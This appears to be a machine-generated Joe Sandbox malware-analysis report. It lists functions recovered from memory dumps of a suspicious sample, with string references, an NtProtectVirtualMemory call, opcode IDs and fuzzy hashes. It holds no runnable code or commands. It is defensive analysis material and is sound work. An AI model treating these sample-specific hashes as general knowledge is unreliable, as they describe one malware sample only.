Instruction Fuzzy Hash: DE712875E00629CFDB64DF69DC50AD9BBB2FF89300F1081AAC509AB250DB306E85CF90

Function 06206BC1 Relevance: 2.6, Strings: 1, Instructions: 1340COMMON

Download Yara Rule

Strings

$dq, xrefs: 06207232

Memory Dump Source

Source File: 00000000.00000002.1982813717.0000000006200000.00000040.00000800.00020000.00000000.sdmp, Offset: 06200000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6200000_LE-Y5029-D3948-W3029-K4302-Q20930-R4039-Y4938-E3028-LA3829-D300.jbxd

Similarity

API ID:
String ID: $dq
API String ID: 0-847773763
Opcode ID: 2b7777f4d353197241871ed558b55be6d2ae9959aaa28bcd84ea8f5ddb9d15cd
Instruction ID: 37b9aa48406e50c397b7eb165b55a48fa776e8611eca4c223b4eb5fec49185fc
Opcode Fuzzy Hash: 2b7777f4d353197241871ed558b55be6d2ae9959aaa28bcd84ea8f5ddb9d15cd
Instruction Fuzzy Hash: 2CE2B374E002298FDB64DF69D88469EBBF6FB89301F1085E9D909AB355DB306E85CF40

Function 06594470 Relevance: 1.9, Strings: 1, Instructions: 688COMMON

Download Yara Rule

Strings

(hq, xrefs: 06594628

Memory Dump Source

Source File: 00000000.00000002.1984271945.0000000006590000.00000040.00000800.00020000.00000000.sdmp, Offset: 06590000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6590000_LE-Y5029-D3948-W3029-K4302-Q20930-R4039-Y4938-E3028-LA3829-D300.jbxd

Similarity

API ID:
String ID: (hq
API String ID: 0-4060669308
Opcode ID: 4a273234a02ade62a8b44a315271f0138f27ce4b79a606984d1bee02678e52a9
Instruction ID: e04d4def53b4d3370c5284e0ca9e78b04e69d582dfe40c05a85bbc5d0774cfc9
Opcode Fuzzy Hash: 4a273234a02ade62a8b44a315271f0138f27ce4b79a606984d1bee02678e52a9
Instruction Fuzzy Hash: 23427770B003168FCB99DF69D49866EBBF2FF88300F248529D55A97391CB34AD42CB91

Function 06300040 Relevance: 1.7, Strings: 1, Instructions: 444COMMON

Download Yara Rule

Strings

Tedq, xrefs: 063003E1

Memory Dump Source

Source File: 00000000.00000002.1983135438.0000000006300000.00000040.00000800.00020000.00000000.sdmp, Offset: 06300000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6300000_LE-Y5029-D3948-W3029-K4302-Q20930-R4039-Y4938-E3028-LA3829-D300.jbxd

Similarity

API ID:
String ID: Tedq
API String ID: 0-228892971
Opcode ID: 3fdf02eda106fbdcffd23bf976c0d227cd598e8a3fd33bc318b0b5470af0d217
Instruction ID: df22548fa8f824e9be26f7501f6a8369782ebbb5cccf2d8cd0ca88136652aa00
Opcode Fuzzy Hash: 3fdf02eda106fbdcffd23bf976c0d227cd598e8a3fd33bc318b0b5470af0d217
Instruction Fuzzy Hash: 5F121874E04218CFEBA8DF69D854B9DB7F6FB89300F1081A9D409AB295DB345D88CF80

Function 064A1748 Relevance: 1.6, APIs: 1, Instructions: 105nativeCOMMON

Download Yara Rule

APIs

NtProtectVirtualMemory.NTDLL(?,?,?,?,?), ref: 064A17FD

Memory Dump Source

Source File: 00000000.00000002.1983779655.00000000064A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06450000, based on PE: true

Associated: 00000000.00000002.1983655225.0000000006450000.00000004.08000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6450000_LE-Y5029-D3948-W3029-K4302-Q20930-R4039-Y4938-E3028-LA3829-D300.jbxd

Similarity

API ID: MemoryProtectVirtual
String ID:
API String ID: 2706961497-0
Opcode ID: dfa32660a7d347ec1e1e61249b7a2ffd2740298820209011ddb78a4a34e05c0b
Instruction ID: 79f633631cbfd2ba1da6a867b5c83af6194704156ec550bd16259619f41421b8
Opcode Fuzzy Hash: dfa32660a7d347ec1e1e61249b7a2ffd2740298820209011ddb78a4a34e05c0b
Instruction Fuzzy Hash: 7A4199B9D002589FCF10CFAAD880ADEFBB5BB59310F10902AE819B7340D735A945CF58

Function 0670F120 Relevance: 1.5, Strings: 1, Instructions: 276COMMON

Download Yara Rule

Strings

Dkq, xrefs: 0670F225

Memory Dump Source

Source File: 00000000.00000002.1984348262.00000000066F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_66f0000_LE-Y5029-D3948-W3029-K4302-Q20930-R4039-Y4938-E3028-LA3829-D300.jbxd

Similarity

API ID:
String ID: Dkq
API String ID: 0-2786294174
Opcode ID: 85f97e9d2390dbb51757bdfdbf5fb3daa09e651ecb039785822b8ed170ce4d4e
Instruction ID: ddf2e0dba540806273cb38a4d86ed04ad371630aeed95d1e8d4e3f6ecfc16e5c
Opcode Fuzzy Hash: 85f97e9d2390dbb51757bdfdbf5fb3daa09e651ecb039785822b8ed170ce4d4e
Instruction Fuzzy Hash: F9D1A174A01219DFDB54DFA9D994A9DBBF2FF88300F2080A9D409AB365DB34AD81CF51

Function 06317CB0 Relevance: 1.5, Strings: 1, Instructions: 257COMMON

Download Yara Rule

Strings

Tedq, xrefs: 06317D93

Memory Dump Source

Source File: 00000000.00000002.1983173645.0000000006310000.00000040.00000800.00020000.00000000.sdmp, Offset: 06310000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6310000_LE-Y5029-D3948-W3029-K4302-Q20930-R4039-Y4938-E3028-LA3829-D300.jbxd

Similarity

API ID:
String ID: Tedq
API String ID: 0-228892971
Opcode ID: 75c962636ac4d03fc90aba41d38c0438c00397c2976432f6065a7463891d11bd
Instruction ID: d6966677aec647813f0830ad51981cb3b37cf2053efddcef9f5c1cd3328fca98
Opcode Fuzzy Hash: 75c962636ac4d03fc90aba41d38c0438c00397c2976432f6065a7463891d11bd
Instruction Fuzzy Hash: FDB1D670E0521CCFDB58CFAAD844BADBBF6BF89300F249069D419AB251DB345985CF90

Function 06597B2F Relevance: 1.5, Strings: 1, Instructions: 216COMMON

Download Yara Rule

Strings

dhq, xrefs: 06597D7F

Memory Dump Source

Source File: 00000000.00000002.1984271945.0000000006590000.00000040.00000800.00020000.00000000.sdmp, Offset: 06590000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6590000_LE-Y5029-D3948-W3029-K4302-Q20930-R4039-Y4938-E3028-LA3829-D300.jbxd

Similarity

API ID:
String ID: dhq
API String ID: 0-2324836203
Opcode ID: d7188c790e887ab6e0fa0c659c361b2bc7f232e02e4393f5ea454517fb5040e6
Instruction ID: 3da8a49859a6ba213dbfb787e6e8435013a2b24f5f14eba5f49270fc0d068d24
Opcode Fuzzy Hash: d7188c790e887ab6e0fa0c659c361b2bc7f232e02e4393f5ea454517fb5040e6
Instruction Fuzzy Hash: 3E914774925218CFDB50DF69E848BEDBBF2FB89300F10846AD409AB251DB345A85CF61

Function 06597B60 Relevance: 1.4, Strings: 1, Instructions: 191COMMON

Download Yara Rule

Strings

dhq, xrefs: 06597D7F

Memory Dump Source

Source File: 00000000.00000002.1984271945.0000000006590000.00000040.00000800.00020000.00000000.sdmp, Offset: 06590000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6590000_LE-Y5029-D3948-W3029-K4302-Q20930-R4039-Y4938-E3028-LA3829-D300.jbxd

Similarity

API ID:
String ID: dhq
API String ID: 0-2324836203
Opcode ID: 1967972cdea1abad989619689cb97df75120d2699ff2909debbf6657f6314b80
Instruction ID: 385e2bf2e6e93cdb59ddf4c261d8dd14507879ba981f760576c2f4f016c291a5
Opcode Fuzzy Hash: 1967972cdea1abad989619689cb97df75120d2699ff2909debbf6657f6314b80
Instruction Fuzzy Hash: 83812674D25218CFDB54DFA9E848BADBBF2FB89304F10846AD409A7250DB345A85CF61

Function 0631818F Relevance: 1.4, Strings: 1, Instructions: 102COMMON

Download Yara Rule

Strings

', xrefs: 06318194

Memory Dump Source

Source File: 00000000.00000002.1983173645.0000000006310000.00000040.00000800.00020000.00000000.sdmp, Offset: 06310000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6310000_LE-Y5029-D3948-W3029-K4302-Q20930-R4039-Y4938-E3028-LA3829-D300.jbxd

Similarity

API ID:
String ID: '
API String ID: 0-1997036262
Opcode ID: 8d5ac64b41938f37ed382a9cc0d2407f7f7a2eefe5d009ccb8392ffa1e91c06b
Instruction ID: ecb19b8d9dc2f4c0485fe9906e34fdeda06c31058467123dd43a7d9142935afd
Opcode Fuzzy Hash: 8d5ac64b41938f37ed382a9cc0d2407f7f7a2eefe5d009ccb8392ffa1e91c06b
Instruction Fuzzy Hash: 6F416F71E05A189BEB5CCF6BCC4069EFAF7AFC9301F14C1B9940CAA259EB7405468F41

Function 06208533 Relevance: .5, Instructions: 539COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1982813717.0000000006200000.00000040.00000800.00020000.00000000.sdmp, Offset: 06200000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6200000_LE-Y5029-D3948-W3029-K4302-Q20930-R4039-Y4938-E3028-LA3829-D300.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1b46dcaf6af2eabbac8b9b24518c54b87234299ff0f3bb148f927fa8614300e1
Instruction ID: f790cabd2a8792e11396ac7c60b60e6eeb85c561d48a42330016b37ff87b1635
Opcode Fuzzy Hash: 1b46dcaf6af2eabbac8b9b24518c54b87234299ff0f3bb148f927fa8614300e1
Instruction Fuzzy Hash: EC52C474A102298FDBA4DF28D988B9AB7B6FB88301F1085D5D90DA7355DB30AEC0CF51

Function 063E7A51 Relevance: .3, Instructions: 297COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1983480753.00000000063E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 063E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_63e0000_LE-Y5029-D3948-W3029-K4302-Q20930-R4039-Y4938-E3028-LA3829-D300.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: db60b3f2c4757e929e43af1df15583d0a5a4df8196482d544cbf565b44bea2d4
Instruction ID: 3a6fbe86a942379cc4d35679bd763a00298380f8b5bc05f6c1917f7850b6a123
Opcode Fuzzy Hash: db60b3f2c4757e929e43af1df15583d0a5a4df8196482d544cbf565b44bea2d4
Instruction Fuzzy Hash: DDD1F574E05218CFEB94DFA9D884BADBBF6FB89310F108069D409AB390DB745985CF91

Function 063E7A60 Relevance: .3, Instructions: 292COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1983480753.00000000063E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 063E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_63e0000_LE-Y5029-D3948-W3029-K4302-Q20930-R4039-Y4938-E3028-LA3829-D300.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d3625b788832f751e117e091a045a4792d73328f9ad659c407ebd395ff29b553
Instruction ID: 146de17c2331c9b5f96914325faff322c20ac5878552ce085cd2a395d842c919
Opcode Fuzzy Hash: d3625b788832f751e117e091a045a4792d73328f9ad659c407ebd395ff29b553
Instruction Fuzzy Hash: 6CC1F674E04218CFEB94DFA5D844BADBBF6FB89310F108069D409AB390DB745985CF90

Function 063E6178 Relevance: .3, Instructions: 277COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1983480753.00000000063E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 063E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_63e0000_LE-Y5029-D3948-W3029-K4302-Q20930-R4039-Y4938-E3028-LA3829-D300.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f73e3a5b842dc1fabd65592673b51c57d214983ec85b6bf8f2a3728bb7c9d502
Instruction ID: 4631e8df293068a9ccd479f0dd6e5e8d6571a22a90d5d0d1a94cd20008275b8f
Opcode Fuzzy Hash: f73e3a5b842dc1fabd65592673b51c57d214983ec85b6bf8f2a3728bb7c9d502
Instruction Fuzzy Hash: 9DC10274E00228CFDB54CFA9D845B9DBBF6FB9A300F10806AD409AB295DB349985CF91

Function 063E6188 Relevance: .3, Instructions: 273COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1983480753.00000000063E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 063E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_63e0000_LE-Y5029-D3948-W3029-K4302-Q20930-R4039-Y4938-E3028-LA3829-D300.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4482db53d2c67297955219c30d7db468eedde7815be2da57cef93a5d23ca8170
Instruction ID: 6dc2408cd5845be040e5c377824681e30a72aaffdee7b5204d842c0a193c76f8
Opcode Fuzzy Hash: 4482db53d2c67297955219c30d7db468eedde7815be2da57cef93a5d23ca8170
Instruction Fuzzy Hash: 5FC11474E00228CFDB94CFA9D845B9DBBF6FB9A300F109029D409AB295DB349C85CF90

Function 063E9BD0 Relevance: .3, Instructions: 258COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1983480753.00000000063E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 063E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_63e0000_LE-Y5029-D3948-W3029-K4302-Q20930-R4039-Y4938-E3028-LA3829-D300.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 191e65ab307c3be8e112bc136033fd1bef8c1903fcccf074a9f53a105023afee
Instruction ID: a4952708aa3548f3818dd9d018aad1431af591351a16182feab7c0afe04e6daa
Opcode Fuzzy Hash: 191e65ab307c3be8e112bc136033fd1bef8c1903fcccf074a9f53a105023afee
Instruction Fuzzy Hash: F4B10574E00228DFDB94DFA5D884BEDBBF6FB49300F108169D419AB294CB786985CF94

Function 063E9048 Relevance: .3, Instructions: 253COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1983480753.00000000063E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 063E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_63e0000_LE-Y5029-D3948-W3029-K4302-Q20930-R4039-Y4938-E3028-LA3829-D300.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8d3e8443b1acf3c08113cd3b5449cfa395d043adab6444ea36c7ae0b9bdf6041
Instruction ID: 81f597ed08afbf30ee36cc0ae4a5d725a6a5765e2d5884462bc62028f9824e98
Opcode Fuzzy Hash: 8d3e8443b1acf3c08113cd3b5449cfa395d043adab6444ea36c7ae0b9bdf6041
Instruction Fuzzy Hash: 0BB13A74E01228CFEB94DF65D844B9DBBF6FB89300F5080A9D419AB284DB745D85CF90

Function 063E9058 Relevance: .2, Instructions: 246COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1983480753.00000000063E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 063E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_63e0000_LE-Y5029-D3948-W3029-K4302-Q20930-R4039-Y4938-E3028-LA3829-D300.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cefde7b75855c18ef4d7c61ccce6c367921ef4c1bbc11b39d7c8c034c8ad7599
Instruction ID: 26590d09dca1a3215ac397c0b04d6fd49daf613efd9b4da17373cb67fab31d9e
Opcode Fuzzy Hash: cefde7b75855c18ef4d7c61ccce6c367921ef4c1bbc11b39d7c8c034c8ad7599
Instruction Fuzzy Hash: 65B11874E01228CFEB94DF69D844BADBBF6FB89300F5080A9D419AB284DB745D85CF91

Function 0659DFF8 Relevance: .2, Instructions: 234COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1984271945.0000000006590000.00000040.00000800.00020000.00000000.sdmp, Offset: 06590000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6590000_LE-Y5029-D3948-W3029-K4302-Q20930-R4039-Y4938-E3028-LA3829-D300.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9c92c2b4b8ce2d08ddeb202c49c3abe21dcc5e8b974271a0e2cbeb62b2ca5a04
Instruction ID: 7c7765020c81704fedd8df2c567530892908b2cce42d29811b9e4ac4df7260e5
Opcode Fuzzy Hash: 9c92c2b4b8ce2d08ddeb202c49c3abe21dcc5e8b974271a0e2cbeb62b2ca5a04
Instruction Fuzzy Hash: 0AA11974E10218DFDB94CF69D889BAEBBF2FF4A300F108469D419AB251DB34A985CF51

Function 0659E008 Relevance: .2, Instructions: 231COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1984271945.0000000006590000.00000040.00000800.00020000.00000000.sdmp, Offset: 06590000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6590000_LE-Y5029-D3948-W3029-K4302-Q20930-R4039-Y4938-E3028-LA3829-D300.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ad7a606fb057129c9eb541ac990aa3cdc7b7ecfed44711a7b4e61dddfc524685
Instruction ID: 5294f8076a9f6bdf06beb2ff62a91b6675df9300b9432bbd34ca9f539595b750
Opcode Fuzzy Hash: ad7a606fb057129c9eb541ac990aa3cdc7b7ecfed44711a7b4e61dddfc524685
Instruction Fuzzy Hash: 53A12774E10218DFDB94CF69E889BADBBF2FF4A300F109469D409AB251DB34A985CF50

Function 0659E10B Relevance: .2, Instructions: 222COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1984271945.0000000006590000.00000040.00000800.00020000.00000000.sdmp, Offset: 06590000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6590000_LE-Y5029-D3948-W3029-K4302-Q20930-R4039-Y4938-E3028-LA3829-D300.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2803bd6e3b9a12f5587df167878ced73e910995e7cf51ac076469256b2a5d72b
Instruction ID: af2a697372cee3479ecbec976742c784327eeb4d3aae4cf7d24f8b9664d47768
Opcode Fuzzy Hash: 2803bd6e3b9a12f5587df167878ced73e910995e7cf51ac076469256b2a5d72b
Instruction Fuzzy Hash: 2B91F574E50218CFDB94DFA9D889BADBBF2FF4A300F109469D409AB251DB34A985CF50

Function 063E69E8 Relevance: .2, Instructions: 203COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1983480753.00000000063E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 063E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_63e0000_LE-Y5029-D3948-W3029-K4302-Q20930-R4039-Y4938-E3028-LA3829-D300.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7093b1402df7d2ed15d075160bfd0f54034595f28688fae2f61205a44fb5ee04
Instruction ID: 662c70c19144e3776989131b4d0cfc4481c047d194c4ff1dd8fedc328c288849
Opcode Fuzzy Hash: 7093b1402df7d2ed15d075160bfd0f54034595f28688fae2f61205a44fb5ee04
Instruction Fuzzy Hash: 0D810570D05229CFDB94CFAAD8457ADBBF6FB9A304F209029D019A7291DB346D85CF90

Function 063E69F8 Relevance: .2, Instructions: 195COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1983480753.00000000063E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 063E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_63e0000_LE-Y5029-D3948-W3029-K4302-Q20930-R4039-Y4938-E3028-LA3829-D300.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 51550563e59df6a513c881d7a67cce5a84f0ac3998a97e397d2d5d2b41575108
Instruction ID: 80271ab87507b6d6c92f89c36f578ec36aa4a12d73b2afe04cd02025d9bde054
Opcode Fuzzy Hash: 51550563e59df6a513c881d7a67cce5a84f0ac3998a97e397d2d5d2b41575108
Instruction Fuzzy Hash: C0810770D05229CFDB94CFAAD9457ADBBF6FB99300F209029D019A7291DB346D85CF90

Function 064A0848 Relevance: .1, Instructions: 144COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1983779655.00000000064A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06450000, based on PE: true

Associated: 00000000.00000002.1983655225.0000000006450000.00000004.08000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6450000_LE-Y5029-D3948-W3029-K4302-Q20930-R4039-Y4938-E3028-LA3829-D300.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 89a8ee1feda8c2404de13fa3890099722ac6ab3caca0dc0edd1af71d07785f03
Instruction ID: ced7bdeefc93fc1ee27d9f37cdf402456424f2e53e24c0aa0852c56b6ec29617
Opcode Fuzzy Hash: 89a8ee1feda8c2404de13fa3890099722ac6ab3caca0dc0edd1af71d07785f03
Instruction Fuzzy Hash: F161C370D04218DFEB64CF6AC88479EBBF2AF99704F1080AAC509B7251DB745A85CF95

Function 0620CEF0 Relevance: .1, Instructions: 88COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1982813717.0000000006200000.00000040.00000800.00020000.00000000.sdmp, Offset: 06200000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6200000_LE-Y5029-D3948-W3029-K4302-Q20930-R4039-Y4938-E3028-LA3829-D300.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c1fdabad16649d2255b16f81fabceb6f694cbffdbfd0ce27c05dd754925be0d3
Instruction ID: 5b11a99788a9f61d016a29f4c503aa62c8149fbefc984a5ec05cd56c4c92c782
Opcode Fuzzy Hash: c1fdabad16649d2255b16f81fabceb6f694cbffdbfd0ce27c05dd754925be0d3
Instruction Fuzzy Hash: 2131EAB0E152188BEB58CF6AC8446DABBF7BFC9300F14D5AAD80DA6255DF7049859F40

Function 0630B8C0 Relevance: 7.7, Strings: 6, Instructions: 161
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

4'dq, xrefs: 0630B984
(hq, xrefs: 0630BA9A
4'dq, xrefs: 0630BA1A
4'dq, xrefs: 0630B954
phq, xrefs: 0630BA27
4'dq, xrefs: 0630B9A2

Memory Dump Source

Source File: 00000000.00000002.1983135438.0000000006300000.00000040.00000800.00020000.00000000.sdmp, Offset: 06300000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6300000_LE-Y5029-D3948-W3029-K4302-Q20930-R4039-Y4938-E3028-LA3829-D300.jbxd

Similarity

API ID:
String ID: (hq$4'dq$4'dq$4'dq$4'dq$phq
API String ID: 0-3112631775
Opcode ID: cf98b0dd8e80e606433175dc0a20631e3af5a57e5be7a64f2ee556d639c50318
Instruction ID: b2a0053b28df3c22fc6f705f81fae6fafe5d1c769506642063f95aca47b1fbf6
Opcode Fuzzy Hash: cf98b0dd8e80e606433175dc0a20631e3af5a57e5be7a64f2ee556d639c50318
Instruction Fuzzy Hash: 0351BF70A003058FD745DB69D8506AFBBE6FFD8301F248829C40A9B691DB359E4687E1

Function 0630A610 Relevance: 4.2, Strings: 3, Instructions: 490
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

Hhq, xrefs: 0630AB64
Hhq, xrefs: 0630AB14
Hhq, xrefs: 0630AAE5

Memory Dump Source

Source File: 00000000.00000002.1983135438.0000000006300000.00000040.00000800.00020000.00000000.sdmp, Offset: 06300000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6300000_LE-Y5029-D3948-W3029-K4302-Q20930-R4039-Y4938-E3028-LA3829-D300.jbxd

Similarity

API ID:
String ID: Hhq$Hhq$Hhq
API String ID: 0-327223379
Opcode ID: ad41e1963a2d51c9541250fa6ed55a8686540b00b3d1ca276cc2272e4b8b203e
Instruction ID: ecc63d65051855c9da59bde5094f1e337055922c0b1ff73f77365451228bba68
Opcode Fuzzy Hash: ad41e1963a2d51c9541250fa6ed55a8686540b00b3d1ca276cc2272e4b8b203e
Instruction Fuzzy Hash: 68125131A003099FDBA5DFA5E8546AEBBF2FF84310F148529D5069B391DB35EC4ACB90

Function 0630C2C8 Relevance: 4.1, Strings: 3, Instructions: 370
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

4'dq, xrefs: 0630C5C1
4'dq, xrefs: 0630C641
4'dq, xrefs: 0630C4E2

Memory Dump Source

Source File: 00000000.00000002.1983135438.0000000006300000.00000040.00000800.00020000.00000000.sdmp, Offset: 06300000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6300000_LE-Y5029-D3948-W3029-K4302-Q20930-R4039-Y4938-E3028-LA3829-D300.jbxd

Similarity

API ID:
String ID: 4'dq$4'dq$4'dq
API String ID: 0-2431816566
Opcode ID: 07d485371c71baf73913df22ae164fc2858aff42ce69f6eecf2bad0ba1413a93
Instruction ID: d62feadded8c7e15b38da9e99dec0566b3a48445c4ba844833cc1a20e3059480
Opcode Fuzzy Hash: 07d485371c71baf73913df22ae164fc2858aff42ce69f6eecf2bad0ba1413a93
Instruction Fuzzy Hash: 91F1FD34A10218CFDB54DFA4D9A8A9DB7B2FF88300F118154E906AB3A5DB71EC46CF90

Function 06221EA8 Relevance: 3.1, Strings: 2, Instructions: 577COMMON

Download Yara Rule

Strings

4'dq, xrefs: 06222669
4'dq, xrefs: 06222659

Memory Dump Source

Source File: 00000000.00000002.1982853243.0000000006220000.00000040.00000800.00020000.00000000.sdmp, Offset: 06220000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6220000_LE-Y5029-D3948-W3029-K4302-Q20930-R4039-Y4938-E3028-LA3829-D300.jbxd

Similarity

API ID:
String ID: 4'dq$4'dq
API String ID: 0-2306408947
Opcode ID: 2dba575147ee805841fc19218e3f0365ba5fbfa69e47c12ead0d205847da33f0
Instruction ID: 6d6f989c70280eebcc0ce759bde7c63deb61ef821e2bb4d8c7a54f303378aad6
Opcode Fuzzy Hash: 2dba575147ee805841fc19218e3f0365ba5fbfa69e47c12ead0d205847da33f0
Instruction Fuzzy Hash: CB42F774E2222ADFDBA8CF94D458ABEB7B2FB48301F108019DD166B254D7755A81CF90

Function 06306B79 Relevance: 3.0, Strings: 2, Instructions: 484
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

$dq, xrefs: 06306EA3
$dq, xrefs: 06306E93

Memory Dump Source

Source File: 00000000.00000002.1983135438.0000000006300000.00000040.00000800.00020000.00000000.sdmp, Offset: 06300000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6300000_LE-Y5029-D3948-W3029-K4302-Q20930-R4039-Y4938-E3028-LA3829-D300.jbxd

Similarity

API ID:
String ID: $dq$$dq
API String ID: 0-2340669324
Opcode ID: fd8592187367ab04b0f2a893df70ae3f9577a9dfdc5b333d4f190360e7da0408
Instruction ID: 1e05b395b4e4535d00ed8e1378cff1706dd408fce4741189bb76e38806ee878e
Opcode Fuzzy Hash: fd8592187367ab04b0f2a893df70ae3f9577a9dfdc5b333d4f190360e7da0408
Instruction Fuzzy Hash: 08127C30E002198FEB55DFA5D865AADBBF2FF48701F148155E811AB394DB38AD4ACF90

Function 062229D0 Relevance: 2.9, Strings: 2, Instructions: 362
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

4'dq, xrefs: 06222E66
4'dq, xrefs: 06222E76

Memory Dump Source

Source File: 00000000.00000002.1982853243.0000000006220000.00000040.00000800.00020000.00000000.sdmp, Offset: 06220000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6220000_LE-Y5029-D3948-W3029-K4302-Q20930-R4039-Y4938-E3028-LA3829-D300.jbxd

Similarity

API ID:
String ID: 4'dq$4'dq
API String ID: 0-2306408947
Opcode ID: b8f0dc718cf8525b872b3d61403fcd11d0352b55f9e669ccc285c88661ef21a4
Instruction ID: d54b63d6ac5bf2394078168a9ccde4335798119370674659563387fa89beac88
Opcode Fuzzy Hash: b8f0dc718cf8525b872b3d61403fcd11d0352b55f9e669ccc285c88661ef21a4
Instruction Fuzzy Hash: 57F1B934D1131AEFCBA4DFA4E4986ADBBB2FF49315F508029E806A7350CB756A81CF51

Function 06309CC0 Relevance: 2.8, Strings: 2, Instructions: 349
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

d, xrefs: 06309F21
(hq, xrefs: 06309CD4

Memory Dump Source

Source File: 00000000.00000002.1983135438.0000000006300000.00000040.00000800.00020000.00000000.sdmp, Offset: 06300000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6300000_LE-Y5029-D3948-W3029-K4302-Q20930-R4039-Y4938-E3028-LA3829-D300.jbxd

Similarity

API ID:
String ID: (hq$d
API String ID: 0-2835645469
Opcode ID: b0115fe468883691c77240bea28d6288eb8fa745e56083f11522a409a098ba41
Instruction ID: 61e4faf325325d4b9bf84f3b012557ae80663a7eb0227d336c34b858d2619e59
Opcode Fuzzy Hash: b0115fe468883691c77240bea28d6288eb8fa745e56083f11522a409a098ba41
Instruction Fuzzy Hash: 6FD16C306006068FCB54CF29C494A6AB7F6FFC8311B56C959E45A8B7A6DB30FC59CB90

Function 062226A8 Relevance: 2.7, Strings: 2, Instructions: 231
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

4'dq, xrefs: 06222988
4'dq, xrefs: 06222998

Memory Dump Source

Source File: 00000000.00000002.1982853243.0000000006220000.00000040.00000800.00020000.00000000.sdmp, Offset: 06220000, based on PE: false

Joe Sandbox IDA Plugin

